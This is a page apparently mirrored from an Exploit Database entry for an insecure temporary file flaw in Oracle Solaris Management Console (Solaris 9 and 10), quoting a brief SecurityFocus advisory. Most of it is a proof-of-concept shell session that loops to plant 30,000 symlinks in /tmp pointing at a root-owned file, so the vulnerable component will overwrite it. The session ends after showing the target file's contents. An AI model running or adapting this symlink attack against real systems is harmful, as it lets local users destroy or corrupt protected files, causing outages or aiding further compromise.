Oracle Solaris Management Console – WBEM Insecure Temporary File Creation

• Exploit Database
• 131 阅读

• 作者： Frank Stuart
  日期： 2010-07-13
• 类别：

  • local
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/34314/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  source: https://www.securityfocus.com/bid/41642/info   The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.   An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.   Solaris 9 and 10 are affected.   $ id uid=101(fstuart) gid=14(sysadmin) $ cd /tmp $ x=0 $ while [ "$x" -ne 30000 ] ;do > ln -s /etc/important /tmp/dummy.$x > x=$(expr "$x" + 1) > done $ ls -dl /etc/important -rw-r--r-- 1 root root38 Jan3 22:43 /etc/important $ cat /etc/important This is an important file!   EOF